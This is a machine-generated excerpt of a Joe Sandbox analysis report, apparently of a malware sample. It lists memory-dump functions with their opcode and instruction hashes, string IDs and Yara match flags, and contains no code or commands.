                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: /,-
                                  • API String ID: 0-1700940157
                                  • Opcode ID: bd61eaabca8c3d4106ab26b04688d9f0e7a3b9e8178b00c10dfc939fc062fcac
                                  • Instruction ID: 18a11e09c2e97c708736080849c9b19c351ac9688e2542ee5bd869c5c9303632
                                  • Opcode Fuzzy Hash: bd61eaabca8c3d4106ab26b04688d9f0e7a3b9e8178b00c10dfc939fc062fcac
                                  • Instruction Fuzzy Hash: 28B17A7070A3604BD7248F2CE881A7FB7A2EB92724F19893CF59557291CB39EC05C796
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID: /,-
                                  • API String ID: 2994545307-1700940157
                                  • Opcode ID: e68cf86ee166e556bd12f2f12a5a46f9bc2d0c12cb890ba0df125163a2fef21b
                                  • Instruction ID: 73ea5f1ed436ac76404857fefd2ddfa4c8367646346d3918638d2e9e73e3d7e7
                                  • Opcode Fuzzy Hash: e68cf86ee166e556bd12f2f12a5a46f9bc2d0c12cb890ba0df125163a2fef21b
                                  • Instruction Fuzzy Hash: 8EB18E717083014BD714DF25888163BF792EBCA314F14A92EF5D557392DB39EC068B9A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID: VtA
                                  • API String ID: 2994545307-3724035812
                                  • Opcode ID: e8c9bba709d658e790e2a6ad064546b7b8b5661d45e7256e4bece47e75e6f2c0
                                  • Instruction ID: ed71193d6b2bdbbac52031f97d74cd30495a87e66650ae04c888d17f76a05038
                                  • Opcode Fuzzy Hash: e8c9bba709d658e790e2a6ad064546b7b8b5661d45e7256e4bece47e75e6f2c0
                                  • Instruction Fuzzy Hash: 5DC139766083419FD714CF28D8817AFB7E2AB95310F09892EE4D5D7392C738D885C75A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: bC
                                  • API String ID: 0-3681614764
                                  • Opcode ID: 12f582ca5cb52f02cbb6c7a65b3a2962543ce7e68b8d395708436d5f2da692ba
                                  • Instruction ID: 4d20f92c875f40788edf4275f174b054e137e174bc84352c0492b1430194fbac
                                  • Opcode Fuzzy Hash: 12f582ca5cb52f02cbb6c7a65b3a2962543ce7e68b8d395708436d5f2da692ba
                                  • Instruction Fuzzy Hash: F3C1C176A28215CFCB08CF68E8905AAB7F2FF8E310F19897DD54597351C734A952CB84
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 9YB
                                  • API String ID: 0-659603884
                                  • Opcode ID: cc1449e27a0f5531b09e40fa76c2dd5bb8592e6f2d5bdd274fc9f48ccbd80c23
                                  • Instruction ID: 1cfe0ac6ad2819008f92b10fbbf01a1b5c50993105dc128c753fe97305f097ae
                                  • Opcode Fuzzy Hash: cc1449e27a0f5531b09e40fa76c2dd5bb8592e6f2d5bdd274fc9f48ccbd80c23
                                  • Instruction Fuzzy Hash: 80B1077AA00215CBDB18CFA9D8916BFB7B2FF89310F58816DD442AB355DB395C42CB84
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: .
                                  • API String ID: 0-248832578
                                  • Opcode ID: 2ac21a3dbd00c1a7cfa2cfa9c8571f5cf891ae991bce99d29bc9653d85f38a4a
                                  • Instruction ID: 97dd5f47d1aceffbdb4858e323d549ae8226f85be88dc05c036a382c054b4151
                                  • Opcode Fuzzy Hash: 2ac21a3dbd00c1a7cfa2cfa9c8571f5cf891ae991bce99d29bc9653d85f38a4a
                                  • Instruction Fuzzy Hash: F9914D71E0835A4BC751DE29C88037BB7E9AB81350F688A69EAD4D7391EB34DD418BC1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .
                                  • API String ID: 0-248832578
                                  • Opcode ID: 2ac21a3dbd00c1a7cfa2cfa9c8571f5cf891ae991bce99d29bc9653d85f38a4a
                                  • Instruction ID: 2823e07fbbb50db066b2c442ced4ae8f01fbddd957871d70742adaa2677f6ced
                                  • Opcode Fuzzy Hash: 2ac21a3dbd00c1a7cfa2cfa9c8571f5cf891ae991bce99d29bc9653d85f38a4a
                                  • Instruction Fuzzy Hash: FE912A71E082524BC721CE29CA8025BB7E5AB81350F198A7ED8D5E73D1EA39DD414BC5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 0
                                  • API String ID: 0-4108050209
                                  • Opcode ID: 08d7d0d85d1217bd50795314ef511c4ead64b35a0bf6ca8811da1f806bdc1b7e
                                  • Instruction ID: a98c979057d2a68db4993b44d179f33707be6da79d082217478ee379f7f89145
                                  • Opcode Fuzzy Hash: 08d7d0d85d1217bd50795314ef511c4ead64b35a0bf6ca8811da1f806bdc1b7e
                                  • Instruction Fuzzy Hash: 44914737759A900BC31C9E3C6C622A6BA934BD7330B2EC77DB9B1CB3E6D56988054350
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 0
                                  • API String ID: 0-4108050209
                                  • Opcode ID: 08d7d0d85d1217bd50795314ef511c4ead64b35a0bf6ca8811da1f806bdc1b7e
                                  • Instruction ID: 9f054d13e7867a4d77ca7132c07c00ca598ea50f9319f8eda39875565fe9693e
                                  • Opcode Fuzzy Hash: 08d7d0d85d1217bd50795314ef511c4ead64b35a0bf6ca8811da1f806bdc1b7e
                                  • Instruction Fuzzy Hash: AD914827759A8007D31C9E3D5C622A7BA834BEB330F2DD37EA5B1CB3E5D56888064359
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: ,
                                  • API String ID: 0-3772416878
                                  • Opcode ID: af61cab23f3548dae23a0013b9021eac7b62495e940c422da8dd81882780f669
                                  • Instruction ID: e81c51778a775eb199a0e3dff7e916aa7138b4befd8004fb2debc3a4ceae4cf4
                                  • Opcode Fuzzy Hash: af61cab23f3548dae23a0013b9021eac7b62495e940c422da8dd81882780f669
                                  • Instruction Fuzzy Hash: 54B13A7120C3859FD325DF18C98062BFBE0AFA9704F444E2DE5D997782D631EA18CB96
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ,
                                  • API String ID: 0-3772416878
                                  • Opcode ID: af61cab23f3548dae23a0013b9021eac7b62495e940c422da8dd81882780f669
                                  • Instruction ID: 72525c85f477075dffe7e14f80d8e4d34094ebf61648e765f9981e94dfd3314a
                                  • Opcode Fuzzy Hash: af61cab23f3548dae23a0013b9021eac7b62495e940c422da8dd81882780f669
                                  • Instruction Fuzzy Hash: 88B137711087859FC321DF18C88061BFBE0AFA9704F444A2EF5D997782D675E918CB67
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: gfff
                                  • API String ID: 0-1553575800
                                  • Opcode ID: 04eae5f35bf542833f546afa72f4753c6069cb9a74afe6c9c0fa956fc9adcb4f
                                  • Instruction ID: e4efc6ce61bdba669d3a1e318493805f49db830d5413da9d418529694ec6c910
                                  • Opcode Fuzzy Hash: 04eae5f35bf542833f546afa72f4753c6069cb9a74afe6c9c0fa956fc9adcb4f
                                  • Instruction Fuzzy Hash: 3A717672A182158BD328CF28D855BAFBAD6EBC1304F19C13DD481CB295DB78A94AC781
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: "
                                  • API String ID: 0-123907689
                                  • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                  • Instruction ID: e9a0f5ae0a02dca015362a51a5c5f25a59de53d25038987c40d51da0fb7e000e
                                  • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                  • Instruction Fuzzy Hash: 82712932A283558BD714CF2DC4803AEB7E2ABC5720F29C56DE4A59B391D335DCC58762
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: "
                                  • API String ID: 0-123907689
                                  • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                  • Instruction ID: 33b1f2780e14060464d7ed180fcf8b3e4403934f6fcecc96c03af05ff21b71f5
                                  • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                  • Instruction Fuzzy Hash: 4A71D732B083358BD714CE28E48432FB7E2EBC5750FA9856EE89497351D7389C4587CA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: klm
                                  • API String ID: 0-3800403225
                                  • Opcode ID: d5319d95fe68aebd98aaca92b9825a3df1dae6eff9af15c4fe87a1423c5b3b77
                                  • Instruction ID: fbab8d391cb70804594fb2969dbf4b57704b04da195ac2ac4d1ccbe35a174314
                                  • Opcode Fuzzy Hash: d5319d95fe68aebd98aaca92b9825a3df1dae6eff9af15c4fe87a1423c5b3b77
                                  • Instruction Fuzzy Hash: 9751F3B4A0D3508BD314EF25D81276BB7F2EFA6348F18856EE4D54B391E7398501CB1A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: klm
                                  • API String ID: 0-3800403225
                                  • Opcode ID: 22a1d23ffb192b13ce7e4b67b3c031d181d26310d43a75b7846801cd596ae7fb
                                  • Instruction ID: 28636f09aa369d38186cb30ccd921ca47ee09800af6c8893f52a410bac37f064
                                  • Opcode Fuzzy Hash: 22a1d23ffb192b13ce7e4b67b3c031d181d26310d43a75b7846801cd596ae7fb
                                  • Instruction Fuzzy Hash: 3251E1B56083548BD714DF64C45276BB7F2EFA6308F18996CE4D68B290E7358901CB1A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: pF
                                  • API String ID: 0-4112324664
                                  • Opcode ID: fe2049b3d9abf6bd8e08d2fec2b5cc8118d281e5b2e668e1a48ceb0649ab8eab
                                  • Instruction ID: 4b15e4364feff8b1cae5d4f97873799dd65533a9f2e3c3f3723fc524ea0f092f
                                  • Opcode Fuzzy Hash: fe2049b3d9abf6bd8e08d2fec2b5cc8118d281e5b2e668e1a48ceb0649ab8eab
                                  • Instruction Fuzzy Hash: 6651C572E442698BDB28CF68D8513DEB7B2FB84304F1581BEC55AEB384CB3449468F81
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID: ?^A
                                  • API String ID: 2994545307-4120214115
                                  • Opcode ID: 2c308a6fbd29e83612078340da99c3c212b60cd104204cd4e1c6453a1b582895
                                  • Instruction ID: 9ee6d34e9011fc7addbd5ae762574014bc539ca284b22a695acd6cfcc742d02e
                                  • Opcode Fuzzy Hash: 2c308a6fbd29e83612078340da99c3c212b60cd104204cd4e1c6453a1b582895
                                  • Instruction Fuzzy Hash: 2141783A648300DFE3248B94D880ABBBBA3B7D5310F5D552EC5C527222CB745C81878F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 6B
                                  • API String ID: 0-4127139157
                                  • Opcode ID: e4ae7821e595edd76aaa032931955796ee87cd6bb1a1de6a8bf0ae27a5d1bb00
                                  • Instruction ID: 96ac195b9b02395a12e3507be26d084a31814086cf7b4e33e8fc611c97ddc8d1
                                  • Opcode Fuzzy Hash: e4ae7821e595edd76aaa032931955796ee87cd6bb1a1de6a8bf0ae27a5d1bb00
                                  • Instruction Fuzzy Hash: 90416A79A05102CFE708CF68EC917A9B3B2FF8A311F5A45B8D545E7390CB74A951CB48
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $%
                                  • API String ID: 0-4214564638
                                  • Opcode ID: 8b76b074fb6ee17701ca33ffcb44bdc905631d8a3bea69b2df4b17f098ff2867
                                  • Instruction ID: 3b208cbf8872d5207ff4608125c0a7a1e977cde3c5c0c445b74487ec4415f5e5
                                  • Opcode Fuzzy Hash: 8b76b074fb6ee17701ca33ffcb44bdc905631d8a3bea69b2df4b17f098ff2867
                                  • Instruction Fuzzy Hash: F74120B0D012198BCB24CF98DC917EEB7B2FF45310F098299E545AFB94E7789982CB50
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $%
                                  • API String ID: 0-4214564638
                                  • Opcode ID: d78bc3d5ce02b10deb2a392cf77ba543051be3d806e39ea4f7dd24e4e80accd5
                                  • Instruction ID: 3a12058a654eb28ab9a6ec9325260f0da8ac6e7581b620ea067b04d8af41a39e
                                  • Opcode Fuzzy Hash: d78bc3d5ce02b10deb2a392cf77ba543051be3d806e39ea4f7dd24e4e80accd5
                                  • Instruction Fuzzy Hash: 694124B0E022298BCB10CF99E8513AEB7B1FF55310F09825DE441AB790E7785941CB64
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: ,+*)
                                  • API String ID: 0-3529585375
                                  • Opcode ID: d0860ee87a3522d35f46aac91f37c79de7283bf131867904a39b4a27e1383bdc
                                  • Instruction ID: 0e0b0fc03becc5df130d5d64f7a1f6b59d8ed812cfa78d5d1ef88ff76f56e4f4
                                  • Opcode Fuzzy Hash: d0860ee87a3522d35f46aac91f37c79de7283bf131867904a39b4a27e1383bdc
                                  • Instruction Fuzzy Hash: 8B319139B402259BEB18CF5CDC95BBEB3B3BB8A710F245138E541A7390CB75AD018794
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: o`
                                  • API String ID: 0-3993896143
                                  • Opcode ID: 62f776dcc95a1318bd9c29a2d25ade0fb881a9597666cacb70b5fb249bcdf744
                                  • Instruction ID: 81a524cc9b928007559ef268501da660f61c8254d3ed6182f7b58522a798f89b
                                  • Opcode Fuzzy Hash: 62f776dcc95a1318bd9c29a2d25ade0fb881a9597666cacb70b5fb249bcdf744
                                  • Instruction Fuzzy Hash: 9911E570218381AFC310CF65CDC1B6EBFE29BC2304F65983DE18597251C675E949D705
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: o`
                                  • API String ID: 0-3993896143
                                  • Opcode ID: 62f776dcc95a1318bd9c29a2d25ade0fb881a9597666cacb70b5fb249bcdf744
                                  • Instruction ID: 0bdba0f6bf2b5cd18ae264ba298f37260da84434396a298b3053f459174327b1
                                  • Opcode Fuzzy Hash: 62f776dcc95a1318bd9c29a2d25ade0fb881a9597666cacb70b5fb249bcdf744
                                  • Instruction Fuzzy Hash: 9C11C270218340AFC310DF65DDC1B6BBFE2DBC2204F65983DE185A72A1C675E9499719
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0417c610e5770e3de08e3f27a6132ce354b413bedc9eba632381f23ebbae40da
                                  • Instruction ID: 1dcbf6391fd41f0c0a817e27e8bafbe762063cd3c7318eef4161125519cd5594
                                  • Opcode Fuzzy Hash: 0417c610e5770e3de08e3f27a6132ce354b413bedc9eba632381f23ebbae40da
                                  • Instruction Fuzzy Hash: 57424876A083518BD724CF29C8917ABB7E2EFC5310F19892EE4C597351DB38D845CB8A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 42edef53a1db2b3de2c06a60c4f32876a63e42617b2c0b108f141745477d7c97
                                  • Instruction ID: 46ead43bd988ad5b99a16a21c2ab1060e4939541d0428d2c05e05470f57672f5
                                  • Opcode Fuzzy Hash: 42edef53a1db2b3de2c06a60c4f32876a63e42617b2c0b108f141745477d7c97
                                  • Instruction Fuzzy Hash: 2C52E1715083458FCB14CF18C0806AABFE1FF89305F18897EE8996B391D778E949CB89
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dbc0620a8ce2ba57e9d910984acef19c89c6c78f1b9d7e948e49654559093e9b
                                  • Instruction ID: 716e912dc53aa85acfb5203951d46965f30ba620f2e06857a27532b89e77c42e
                                  • Opcode Fuzzy Hash: dbc0620a8ce2ba57e9d910984acef19c89c6c78f1b9d7e948e49654559093e9b
                                  • Instruction Fuzzy Hash: F652E3B0A08B898FE731DB74C8843B7FBE5AF51314F144C2ED6E646AC2C279A985C745
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 23751e459ccc9bb6a4f1f3a1e8208e8d277617bd75432395b0e424f8c0ad6651
                                  • Instruction ID: 42a8754500a030df467a19eb208a6b75f213c456a02a9d9f5179d7aa03d033db
                                  • Opcode Fuzzy Hash: 23751e459ccc9bb6a4f1f3a1e8208e8d277617bd75432395b0e424f8c0ad6651
                                  • Instruction Fuzzy Hash: B952E3B0A08B949FE730CB24C4843A7BBE1AB91314F15483FD5D756BC2C27DB9958B0A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 83213a2729f592a7edcd98fc7886bfd8d55118cdf426f5e19ae94b324be42bba
                                  • Instruction ID: cff3c9fe2e4f1088af9a17f0bbc18440b7fb6abde5f8b40a4b2cf74605bc6df0
                                  • Opcode Fuzzy Hash: 83213a2729f592a7edcd98fc7886bfd8d55118cdf426f5e19ae94b324be42bba
                                  • Instruction Fuzzy Hash: E512D232A0C7168BC725DF58D8806BBF3E5EFC9315F19892DDAC687281D734A811CB86
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 83213a2729f592a7edcd98fc7886bfd8d55118cdf426f5e19ae94b324be42bba
                                  • Instruction ID: 7b72874d185f9504f09fa30b763c2e13130ca022e31a023e0d3144396e745bed
                                  • Opcode Fuzzy Hash: 83213a2729f592a7edcd98fc7886bfd8d55118cdf426f5e19ae94b324be42bba
                                  • Instruction Fuzzy Hash: 1012A372A0C7118BD725DE18D8806ABB3E1BFC4315F19893ED986A7385D738B8518B87
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a7ebcab429d69887af0994e9597e2f97a4cbfb516015e6b5ad3962d1502a690c
                                  • Instruction ID: aad75f7b7f06f8e8653ed66d9c9fd90f8c37717688dce3aa0c4d8b423ff7698e
                                  • Opcode Fuzzy Hash: a7ebcab429d69887af0994e9597e2f97a4cbfb516015e6b5ad3962d1502a690c
                                  • Instruction Fuzzy Hash: F632D8B1A04B408FD714DF38D8957AABBE1AF85310F18896DD9EB873C1E635E505CB02
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c09ab01705470a57d5ac0deba44fab8d122be945ed84d36d91023274058ae07e
                                  • Instruction ID: 819cfa75d40707277b7651a3d059055683ccfe715dfab14305db8651ec0ec7a0
                                  • Opcode Fuzzy Hash: c09ab01705470a57d5ac0deba44fab8d122be945ed84d36d91023274058ae07e
                                  • Instruction Fuzzy Hash: 8C32E6B5A04B408FD714DF38C5953AABBE1AF45310F188A3ED5EB873D2E638A445CB06
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d327358085ba1a993c9adccc0f3e0ff780f208ec349b024e73061d52e6553d9c
                                  • Instruction ID: 1725f86f939de3d274f03f9397a0161fc2de7986329a98ca3529878c9258b63c
                                  • Opcode Fuzzy Hash: d327358085ba1a993c9adccc0f3e0ff780f208ec349b024e73061d52e6553d9c
